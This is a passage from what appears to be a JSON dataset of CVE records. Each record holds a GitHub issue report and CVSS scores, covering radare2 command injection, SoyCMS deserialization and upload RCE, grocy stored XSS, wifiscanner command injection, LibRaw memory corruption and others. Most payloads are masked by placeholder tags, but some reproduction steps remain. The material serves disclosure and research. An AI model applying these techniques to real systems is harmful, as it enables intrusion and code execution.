At some point (within an hour or so, about NUMBERTAG blocks in), I started to get the error below. I was getting this on all my sentries and validators. Basically, the chain had completely crashed. I tried to restart my validators and sentries, but this was unrecoverable. CODETAG To had no choice but to \"reset\" the whole chain again. I stopped all my validators and sentries and this time, ONLY ran \"unsafe reset all\" on all my daemons. Of course, I also had to do some COSMOS setup again (staking, etc), but started everything again, and asked the community to again do the same steps listed above with yet a new FILETAG , etc. Within an hour, the whole network went down again. Effectively the same error (different block, signature HASH this time): CODETAG What you expected to happen : I expect \"clean\" output, as so: CODETAG APITAG fact that APITAG is non zero is the subject of another investigation) Have you tried the latest version : Not sure. I think so. Although in looking at the Tendermint Github, I see there are two minor versions available that are newer than what we have. How to reproduce it : I more or less explained how it came about above in the \"what happened\" section. Looking at NUMBERTAG I see a similar error message, but not quite the same. But in looking at that issue, it was suggested that perhaps all the nodes did not start from the same \"genesis\" state. It is suggested that perhaps some node(s) have a stale \"home folder\" (.blzd, I presume?). Does \"unsafe reset all\" actually clear out all state including the COSMOS KV stores, app state, etc? I assume this command is sufficient to accomplish a clean slate? Is it possible that in \"resetting\" my chain as I did above, some members of the public possibly forgot to run that \"blzd unsafe reset all\" command, and by missing this step, when they started their node, it had data from the previous chain left over, and this somehow brought the whole network down? 
If so, it is worrying that a single node (or even a few of them) with stale state could bring the whole network down; that would make it an easy APITAG attack vector. Logs : Listed above. Config : No specific changes made to Tendermint. node command runtime flags : This is all running from within our daemon that was built with the COSMOS SDK. APITAG output for consensus bugs Not sure how to do this. Anything else we need to know : Most details given above. I did some searching ahead of time to see if I could resolve this myself. I saw some issues related to it but they are already closed.",
  48408. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  48409. "severity": "MEDIUM",
  48410. "baseScore": 6.5,
  48411. "impactScore": 3.6,
  48412. "exploitabilityScore": 2.8
  48413. },
  48414. {
  48415. "CVE_ID": "CVE-2020-15121",
  48416. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/16945",
  48417. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/16945",
  48418. "Repo_new": "radareorg/radare2",
  48419. "Issue_Created_At": "2020-05-24T12:20:29Z",
  48420. "description": "Command injection across r_sys_cmd . Work environment | Questions | Answers | | | PATHTAG (mandatory) | N/A | File format of the file you reverse (mandatory) | PE | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | >= radare2 APITAG Expected behavior idpd does not cause untrusted code execution on my system. Actual behavior A malformed PDB file name taken from the analyzed PE is interpolated into the PDB server download command, causing shell injection via the following codepath: URLTAG In effect, APITAG is not shell-escaped before the command is run, so an attacker-controlled binary can execute arbitrary commands on the analyst's machine. Note that this is not an isolated case in the code base, grep for APITAG or APITAG for more potential attack vectors. Steps to reproduce the behavior Open the executable in radare2 and run idpd to trigger the download. The injected shell command will execute, and will create a file called pwned in the current directory. Additional Logs, screenshots, source code, configuration dump, ... I have just used a hex editor to patch the APITAG to APITAG in a PE file from the APITAG repository. FILETAG (password is infected ) The example above is specific to the PDB downloader, but more investigation is required to uncover all the possible attack vectors in the radare2 code base.",
  48421. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  48422. "severity": "CRITICAL",
  48423. "baseScore": 9.6,
  48424. "impactScore": 6.0,
  48425. "exploitabilityScore": 2.8
  48426. },
  48427. {
  48428. "CVE_ID": "CVE-2020-15133",
  48429. "Issue_Url_old": "https://github.com/eventmachine/eventmachine/issues/814",
  48430. "Issue_Url_new": "https://github.com/eventmachine/eventmachine/issues/814",
  48431. "Repo_new": "eventmachine/eventmachine",
  48432. "Issue_Created_At": "2017-12-07T08:30:46Z",
  48433. "description": "Request for improved SSL server certificate verification. From URLTAG I'm not entirely sure if this is the right PR/issue to discuss this on, but I can briefly summarize what EM support I think would be required for implementing SSL clients with server certificate verification, Listed in terms of the exposed libssl APIs: FILETAG Supported in eventmachine/eventmachine NUMBERTAG by extending APITAG FILETAG with SSL_VERIFY_PEER: already supported in EM: URLTAG The APITAG callback MUST return false by default if called with APITAG . The APITAG ignoring the APITAG parameter is the most blatantly broken part of the implementation, because this effectively bypasses all of the libssl certificate validation logic \ud83d\udc7f Based on my reading of the docs and issues like eventmachine/eventmachine NUMBERTAG I suspect this even includes very fundamental things like \"the private key used to sign the session key matches the public key in the certificate\". FILETAG : already supported in URLTAG ? I think the APITAG + APITAG changes would be the bare minimum that would be required. These also match the changes dicussed/implemented in eventmachine/eventmachine NUMBERTAG Additional bonus points for: SSL_get_verify_result NUMBERTAG erify_cert_error_string to allow the application to report more useful error messages than just \"certificate verification failed\" Some convenience wrapper for the cert subject/hostname validation ideally there should be some kind of secure: true/false boolean that doesn't require each client developer to research and write their own certificate verification wrappers for the vast majority of usecases I think Ruby's APITAG URLTAG can probably be used by applications together with the APITAG API, so it doesn't necessarily need to be part of EM itself.",
  48434. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
  48435. "severity": "HIGH",
  48436. "baseScore": 8.7,
  48437. "impactScore": 5.8,
  48438. "exploitabilityScore": 2.2
  48439. },
  48440. {
  48441. "CVE_ID": "CVE-2020-15133",
  48442. "Issue_Url_old": "https://github.com/faye/faye/issues/524",
  48443. "Issue_Url_new": "https://github.com/faye/faye/issues/524",
  48444. "Repo_new": "faye/faye",
  48445. "Issue_Created_At": "2020-07-19T21:22:57Z",
  48446. "description": "Address em http request warnings about APITAG . APITAG supports making TCP connections via the [ APITAG ][em connect] method. Once the connection is established, the client can initiate a TLS session over the socket by calling [ APITAG ][em start tls]. This method _does not_ verify the server's identity by default, but it does accept an option named APITAG . If this is set, the connection will invoke [ APITAG ][em verify peer], a method supplied by the caller which performs certificate validation. That is, APITAG does not implement such a validation routine itself; it requires the caller to supply one. APITAG makes use of two libraries that use this interface: [em http request][em http] and [faye websocket][faye ws]. The latter is maintained by the Faye project and the former by a third party. In June NUMBERTAG a [security advisory][em advisory] was published relating to the of of this APITAG interface in em http request. This followed an [issue][issue NUMBERTAG reporting the problem and a [pull request][pr NUMBERTAG to fix it. The em http request maintainers decided to address this problem by publishing a patch version release, version NUMBERTAG making the following changes: Importing an [implementation of APITAG ][faraday verify] from the APITAG library (by copying the code, not by linking to this package) Sending APITAG to APITAG only if instructed by the caller Logging a warning if the caller does not ask for peer verification This course of action was chosen in order to alert existing users to insecure behaviour, and giving them an easy remediation for it; enabling peer verification by default may break some existing legitimate clients, for example clients talking to trusted servers using self signed certificates. It is worth noting a couple of things about the APITAG implementation imported into em http request from Faraday. 
First, Faraday is a common interface over several different Ruby HTTP clients, and em http request is one of its supported adapters. Faraday enables APITAG by default, and therefore patches em http request at runtime to support this. So, this patch exists because Faraday wants peer verification to be default behaviour, and they patched em http request to make it possible. Second, the implementation that em http request has now imported is the very first version of this code committed to Faraday's codebase in July NUMBERTAG released in version NUMBERTAG in January NUMBERTAG This code has been modified a few times since, most recently in October NUMBERTAG before the release of Faraday NUMBERTAG in January NUMBERTAG It is not clear why or how this version of the APITAG code was selected. A cursory inspection of the imported code against [the latest version in Faraday][faraday verify latest], and reading the commit history of this file, indicates the code is doing essentially the same thing in terms of calls to the APITAG module, but has been refactored to clarify control flow and to comply with linter warnings. There has been one [bug fix][fix host] made to the original code to use the hostname from the request URI, not the connection hostname, to verify the certificate (these may differ if the request is sent via a proxy). The code imported into em http request does not include this fix. The Faye project needs to decide how to address this problem. Users that have installed the latest em http request are now seeing warnings in their logs that APITAG is not set. No other functional difference has taken place in these programs; they were already not doing peer verification, what's changed is that their authors now _know_ about it. There are a few things to take into consideration here. The least effort change Faye could make would be to send APITAG to em http request, causing it to verifiy server certificates and removing the warning from users' logs. 
This would have the effect that the initial request to the server would now be verified. However, since faye websocket suffers from the same non verification problem, the Faye client would be making an unverified connection if it subsequently switched to using APITAG This suggests we should have feature parity between these two network transports so that Faye as a whole can make a consistent guarantee to users; enabling verification for normal HTTP but not for APITAG and taking no further measures, would give users a false sense of security. This prompts the question of what changes faye websocket should make to gain parity. In the FILETAG version of Faye, we rely on the default behaviour of the https and tls modules, which is to verify certificates unless explicitly told otherwise. However, sometimes we want to connect to servers whose certificates are not recognised by the usual system certificate authority (CA), for example servers with self signed certificates, even if only for testing purposes. Node provides a mechanism for this: rather than simply turning verification off with the ERRORTAG option, one can use the ca option to pass one's own set of certificate authorities, rather than using the system one. Thus, a client can still trust a server it knows the certificate of, without opting out of verification entirely and exposing itself to person in the middle attacks. The APITAG implementation in em http request does not support this; it only enables the default paths for APITAG and does not let the user set their own. This means that to talk to a server with a self signed cert one would have to leave APITAG unset. APITAG that explicitly setting APITAG rather than merely leaving it unset still causes the warning to be logged.) So, even if faye websocket were to add the ability to set custom CAs, Faye would not be able offer the same ability we're limited by the functionality offered by em http request. 
That said, I would still prefer for faye websocket in Ruby to work like its Node counterpart, and for Faye to get as close as we can to that. i.e. it should set APITAG by default, allow it to be unset, and provide a way to supply your own CAs, which should be preferred over unsetting APITAG . This leaves two remaining problems: implementing the required functionality in faye websocket, and supporting APITAG in Faye itself. If both em http request and faye websocket support setting APITAG , then Faye can make use of this functionality. em http request defaults to not setting this option so we should think about the effect if we were to set it by default. If faye websocket defaults to enabling APITAG , and Faye doesn't have any defined behaviour other than to forward the caller's options to each library, then we'll get different behaviour depending on whether we're using HTTP or APITAG which is undesirable. Whichever default we choose, a later release of em http request might change its behaviour. So either way, Faye needs to have an explicit policy about the default value of APITAG to send to these libraries if this option is not set by the caller. At present (in version NUMBERTAG Faye does not support the caller setting any TLS options that are sent to em http request. The only TLS related option it currently sends is APITAG , which it gets from the request URL. As clients currently do not have any control over the setting of this option, they will be getting the same behaviour as if they'd set APITAG . Therefore, defaulting to APITAG may cause a change in behaviour that could constitute a breaking change. 
There are broadly two categories of situation in which a Faye client would break if APITAG were enabled: The client is not talking to the server it thinks it is, because verification is turned off and the client is being attacked The client is intentionally talking to a server that the system CAs would not recognise, for example a server with a self signed cert I would consider the first situation a bug: this is not intentional usage and the client would benefit from being alerted to the fact it's talking to an untrusted server. Setting APITAG would mean fixing the bug and is therefore not a breaking change. The second situation is intentional and supported usage, and if we set APITAG by default then these clients will stop working. We need to provide these clients with a way to start working again, and would therefore need to expose the APITAG option so they can switch it off. This is not an ideal solution but is the only one open to us given the current functionality exposed in em http request. Exposing this option would constitute a new feature, and breaking these clients in the first place may constitute a breaking change. If Faye defaults to APITAG , then no existing clients would change their behaviour (which may be regarded as a bug per the above), and we would have to expose the ability to enable APITAG . This gives us the option of introducing the option as a new feature without a breaking change, but this would still be at least a minor release, not a patch. As regards the implementation, I have [opened a PR][faye ws pr] against faye websocket containing an implementation to add support for APITAG and APITAG . Details and discussion of the implementation should happen on that PR rather than this issue. I am opening this issue to discuss the overall strategy and how everything needs to fit together in Faye. 
[em]: URLTAG [em connect]: URLTAG [em start tls]: URLTAG [em verify peer]: URLTAG [em http]: URLTAG [faye ws]: URLTAG [faraday]: URLTAG [em advisory]: URLTAG [issue NUMBERTAG URLTAG [pr NUMBERTAG URLTAG [faraday verify]: FILETAG [faraday verify latest]: FILETAG [fix host]: URLTAG [faye ws pr]: URLTAG",
  48447. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
  48448. "severity": "HIGH",
  48449. "baseScore": 8.7,
  48450. "impactScore": 5.8,
  48451. "exploitabilityScore": 2.2
  48452. },
  48453. {
  48454. "CVE_ID": "CVE-2020-15158",
  48455. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/250",
  48456. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/250",
  48457. "Repo_new": "mz-automation/libiec61850",
  48458. "Issue_Created_At": "2020-08-12T05:23:33Z",
  48459. "description": "Possible heap buffer overflow when a COTP message with an invalid size is received. A COTP message whose size field is set to zero can cause an invalid memory access: the length value is used before it is validated, so it must be checked against the expected minimum before any buffer arithmetic.",
  48460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48461. "severity": "CRITICAL",
  48462. "baseScore": 9.8,
  48463. "impactScore": 5.9,
  48464. "exploitabilityScore": 3.9
  48465. },
  48466. {
  48467. "CVE_ID": "CVE-2020-15188",
  48468. "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/10",
  48469. "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/10",
  48470. "Repo_new": "inunosinsi/soycms",
  48471. "Issue_Created_At": "2020-09-14T12:06:36Z",
  48472. "description": "Unauthenticated Remote Code Execution (RCE) in APITAG Title Unauthenticated Remote Code Execution (RCE) in APITAG Summary Severity: Critical APITAG NUMBERTAG and earlier is affected by Unauthenticated Remote Code Execution (RCE). This allows unauthenticated remote attackers to execute arbitrary code whenever the inquiry form feature is enabled on the website. The vulnerability is caused by calling unserialize() on attacker-controlled form data without any restriction. Impact: Unauthenticated Remote Code Execution via Inquiry Form Attack vector is: Inquiry Form needs to be enabled. Components are: Soy Inquiry Form Tested APITAG Version NUMBERTAG latest) Affected APITAG Version NUMBERTAG Found by MENTIONTAG from Vulnerability Research Team in Flatt Security Inc. URLTAG Full Exploit Video: URLTAG Cause When the inquiry is submitted and the captcha is taken, the form submits APITAG and APITAG , and the value is checked as follows. URLTAG Per PHP's official documentation, unserialize() must not be used on data the user can control APITAG FILETAG APITAG can be generated locally, so an attacker can control this value and use suitable classes (a PHP object injection gadget chain) to trigger code execution. Remediation Use APITAG and APITAG instead. I will make a Fix PR as soon as possible.",
  48473. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48474. "severity": "CRITICAL",
  48475. "baseScore": 9.8,
  48476. "impactScore": 5.9,
  48477. "exploitabilityScore": 3.9
  48478. },
  48479. {
  48480. "CVE_ID": "CVE-2020-15189",
  48481. "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/9",
  48482. "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/9",
  48483. "Repo_new": "inunosinsi/soycms",
  48484. "Issue_Created_At": "2020-09-14T12:05:06Z",
  48485. "description": "Remote Code Execution (RCE) in APITAG Title Remote Code Execution (RCE) in APITAG Summary Severity: High APITAG NUMBERTAG and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. The Cross Site Scripting (XSS) vulnerability that was reported earlier can be chained with it to achieve remote code execution by luring a logged-in administrator to a specially crafted webpage. Impact: XSS to RCE via Inquiry Error and Unrestricted File Upload Attack vector is: Administrator must be logged in. Components are: File Manager Tested APITAG Version NUMBERTAG latest) Affected APITAG Version NUMBERTAG Found by MENTIONTAG from Vulnerability Research Team in Flatt Security Inc. URLTAG Full Exploit Video: URLTAG Cause The file upload feature in APITAG is using APITAG However, the MIME type it relies on can be spoofed, so a PHP file can be uploaded, which is what yields code execution. APITAG itself provides no file type check, so one has to be implemented manually. URLTAG URLTAG Remediation Please add a server-side file extension check (an allow-list of permitted extensions) from APITAG URLTAG",
  48486. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48487. "severity": "HIGH",
  48488. "baseScore": 7.2,
  48489. "impactScore": 5.9,
  48490. "exploitabilityScore": 1.2
  48491. },
  48492. {
  48493. "CVE_ID": "CVE-2020-15250",
  48494. "Issue_Url_old": "https://github.com/junit-team/junit4/issues/1676",
  48495. "Issue_Url_new": "https://github.com/junit-team/junit4/issues/1676",
  48496. "Repo_new": "junit-team/junit4",
  48497. "Issue_Created_At": "2020-10-14T06:18:11Z",
  48498. "description": "CVETAG doesn't affect versions prior to NUMBERTAG but claims it did. URLTAG says it affects any version prior to NUMBERTAG which is not true as rules didn't exist before NUMBERTAG So the proper range would be NUMBERTAG up to NUMBERTAG This is probably not terribly important but it caused dependabot to cry wolf on projects that are (deliberately) still using older versions like extensions for APITAG NUMBERTAG that happen to be still maintained. The same is/will soon be true for a bunch of other static code analyzers checking oldish code bases.",
  48499. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  48500. "severity": "MEDIUM",
  48501. "baseScore": 5.5,
  48502. "impactScore": 3.6,
  48503. "exploitabilityScore": 1.8
  48504. },
  48505. {
  48506. "CVE_ID": "CVE-2020-15253",
  48507. "Issue_Url_old": "https://github.com/grocy/grocy/issues/996",
  48508. "Issue_Url_new": "https://github.com/grocy/grocy/issues/996",
  48509. "Repo_new": "grocy/grocy",
  48510. "Issue_Created_At": "2020-09-08T14:34:09Z",
  48511. "description": "XSS and HTML Injection on Create Shopping List APITAG upon deleting it). Vulnerability Name: Stored Cross Site Scripting & HTML Injection Vulnerability Description: grocy household management solution NUMBERTAG allows stored XSS and HTML Injection via the shopping list name in the Create Shopping List module; the stored name is rendered unescaped when that Shopping List is deleted. Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. HTML injection occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. Consequences can be disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. Vulnerable URL: URLTAG Payload NUMBERTAG APITAG NUMBERTAG APITAG HTML Injection APITAG Steps to Reproduce NUMBERTAG Login to the application NUMBERTAG Go to APITAG List' module NUMBERTAG Click on APITAG Shopping List' module NUMBERTAG Enter the payload: APITAG in APITAG input field NUMBERTAG Click Save NUMBERTAG Click APITAG Shopping List' Request: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content type: application/json Content Length NUMBERTAG Connection: close Cookie: APITAG {\"name\":\" APITAG \"}",
  48512. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  48513. "severity": "MEDIUM",
  48514. "baseScore": 4.8,
  48515. "impactScore": 2.7,
  48516. "exploitabilityScore": 1.7
  48517. },
  48518. {
  48519. "CVE_ID": "CVE-2020-15254",
  48520. "Issue_Url_old": "https://github.com/crossbeam-rs/crossbeam/issues/539",
  48521. "Issue_Url_new": "https://github.com/crossbeam-rs/crossbeam/issues/539",
  48522. "Repo_new": "crossbeam-rs/crossbeam",
  48523. "Issue_Created_At": "2020-08-03T20:42:22Z",
  48524. "description": "Memory Leak in crossbeam queue APITAG APITAG git only, ver NUMBERTAG is not affected). Hi. I'm Yoshi, a APITAG student at CMU. We are currently evaluating a project that aims to automatically synthesize test cases for Rust libraries. We ran the synthesized test cases with Miri, and it reports what appears to be a memory leak. The minimum example is: APITAG ERRORTAG It looks like the Drop implementation does not free everything that new allocates. You can also catch this by running cargo miri test inside crossbeam queue. One of your manually written test cases ( capacity ) will induce the same behavior. The first commit to have this issue is APITAG URLTAG . You can confirm this by running cargo miri test on NUMBERTAG commit before. It will not terminate because Miri is extremely slow, but you can see that it gets past the capacity test case. As for the root cause, I suspect that the drop function needs to be modified to match the changes to new , but I am yet to get a PR up. In case this is intended behavior, or you would prefer if I focused on other parts of the code, please let me know. Thanks APITAG",
  48525. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48526. "severity": "CRITICAL",
  48527. "baseScore": 9.8,
  48528. "impactScore": 5.9,
  48529. "exploitabilityScore": 3.9
  48530. },
  48531. {
  48532. "CVE_ID": "CVE-2020-15261",
  48533. "Issue_Url_old": "https://github.com/veyon/veyon/issues/657",
  48534. "Issue_Url_new": "https://github.com/veyon/veyon/issues/657",
  48535. "Repo_new": "veyon/veyon",
  48536. "Issue_Created_At": "2020-09-01T06:12:58Z",
  48537. "description": "Unquoted service path. Hi Veyon team, After installing Veyon NUMBERTAG I noticed that its service, APITAG is hijackable due to the unquoted service path. Using this vulnerability, attackers can execute different files as APITAG It allows local users to replace the service with arbitrary code to escalate their privileges. I hope you check this link for more details: CVETAG",
  48538. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48539. "severity": "MEDIUM",
  48540. "baseScore": 6.7,
  48541. "impactScore": 5.9,
  48542. "exploitabilityScore": 0.8
  48543. },
  48544. {
  48545. "CVE_ID": "CVE-2020-15262",
  48546. "Issue_Url_old": "https://github.com/waysact/webpack-subresource-integrity/issues/131",
  48547. "Issue_Url_new": "https://github.com/waysact/webpack-subresource-integrity/issues/131",
  48548. "Repo_new": "waysact/webpack-subresource-integrity",
  48549. "Issue_Created_At": "2020-10-18T00:48:41Z",
  48550. "description": "Tags are injected with integrity=\"undefined\" on NUMBERTAG I'm on Webpack NUMBERTAG and noticed after upgrading to this plugin's NUMBERTAG release that injected tags have an ERRORTAG integrity. Tags inserted by via html webpack plugin have the correct integrity so the app doesn't fail to load, but dynamically injected tags use ERRORTAG and the integrity check is bypassed. Here's what Firefox prints: ERRORTAG Downgrading to NUMBERTAG fixes this issue so I'm assuming it's related to the changes that added Webpack NUMBERTAG support in NUMBERTAG",
  48551. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  48552. "severity": "LOW",
  48553. "baseScore": 3.7,
  48554. "impactScore": 1.4,
  48555. "exploitabilityScore": 2.2
  48556. },
  48557. {
  48558. "CVE_ID": "CVE-2020-15265",
  48559. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/42105",
  48560. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/42105",
  48561. "Repo_new": "tensorflow/tensorflow",
  48562. "Issue_Created_At": "2020-08-06T20:40:42Z",
  48563. "description": "Segmentation fault in APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG rc NUMBERTAG g2b NUMBERTAG f NUMBERTAG b NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG produces a segfault when input is a tensor in any shape of APITAG or APITAG and axis is specified to a large number. Describe the expected behavior No segfault Standalone code to reproduce the issue APITAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. APITAG",
  48564. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48565. "severity": "HIGH",
  48566. "baseScore": 7.5,
  48567. "impactScore": 3.6,
  48568. "exploitabilityScore": 3.9
  48569. },
  48570. {
  48571. "CVE_ID": "CVE-2020-15266",
  48572. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/42129",
  48573. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/42129",
  48574. "Repo_new": "tensorflow/tensorflow",
  48575. "Issue_Created_At": "2020-08-07T15:04:14Z",
  48576. "description": "segfault in APITAG when boxes contains large value. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG rc NUMBERTAG g2b NUMBERTAG f NUMBERTAG b NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG segfault when there is a very large value in boxes . Can also be reproduced in nightly version Describe the expected behavior Expect no segfault Standalone code to reproduce the issue ~~~python import tensorflow as tf APITAG APITAG NUMBERTAG box_indices NUMBERTAG crop_size NUMBERTAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. ~~~python Segmentation fault (core dumped) ~~~",
  48577. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48578. "severity": "HIGH",
  48579. "baseScore": 7.5,
  48580. "impactScore": 3.6,
  48581. "exploitabilityScore": 3.9
  48582. },
  48583. {
  48584. "CVE_ID": "CVE-2020-15362",
  48585. "Issue_Url_old": "https://github.com/thingsSDK/wifiscanner/issues/1",
  48586. "Issue_Url_new": "https://github.com/thingssdk/wifiscanner/issues/1",
  48587. "Repo_new": "thingssdk/wifiscanner",
  48588. "Issue_Created_At": "2020-06-11T03:20:43Z",
  48589. "description": "Remote Code Execution Bug due to Improper Input Sanitization. This module can be used with options that can be used to overwrite default executable/binary path and arguments to the said executable/binary. An attacker can abuse this functionality to have the module execute a binary of their choice. The following code snippets in the FILETAG is responsible for the issue. ERRORTAG As we can see, _ APITAG _ is not sanitized in anyway prior to being passed to the APITAG . Hence, the following payloads can be used to execute arbitrary commands: Exploit NUMBERTAG ERRORTAG Exploit NUMBERTAG ERRORTAG User input must be appropriately sanitized prior to being passed to the module. At the very least users must be advised to manually sanitize user inputs when using this module.",
  48590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48591. "severity": "CRITICAL",
  48592. "baseScore": 9.8,
  48593. "impactScore": 5.9,
  48594. "exploitabilityScore": 3.9
  48595. },
  48596. {
  48597. "CVE_ID": "CVE-2020-15365",
  48598. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/301",
  48599. "Issue_Url_new": "https://github.com/libraw/libraw/issues/301",
  48600. "Repo_new": "libraw/libraw",
  48601. "Issue_Created_At": "2020-06-15T14:19:19Z",
  48602. "description": "Libraw APITAG Out of bounds write vulnerability. Description An out of bounds write vulnerability exists within the APITAG function ( PATHTAG ) which can be triggered by changing the APITAG from \"CMT1\" to an unknown name and making the \"tiff_nifds\" field equals zero. Steps to Reproduce (poc archive password= girlelecta). URLTAG cmd: FILETAG convert poc.cr3 FILETAG Upon running this, following crash happens only in APITAG NUMBERTAG APITAG I enabled page heap on FILETAG ): Microsoft (R) Windows Debugger Version NUMBERTAG AMD NUMBERTAG Copyright (c) Microsoft Corporation. All rights reserved. APITAG PATHTAG convert e:\\poc.cr3 FILETAG Path validation summary Response Time (ms) Location Deferred srv Symbol search path is: srv Executable search path is: APITAG NUMBERTAG ff7 APITAG NUMBERTAG a NUMBERTAG FILETAG APITAG NUMBERTAG ffc APITAG ef NUMBERTAG ntdll.dll APITAG NUMBERTAG ffc APITAG d4dc NUMBERTAG PATHTAG Page heap: pid NUMBERTAG page heap enabled with flags NUMBERTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ea NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cb2ab NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cafeb NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ecb3e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG edd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eee3e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee5ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4d NUMBERTAG PATHTAG APITAG 
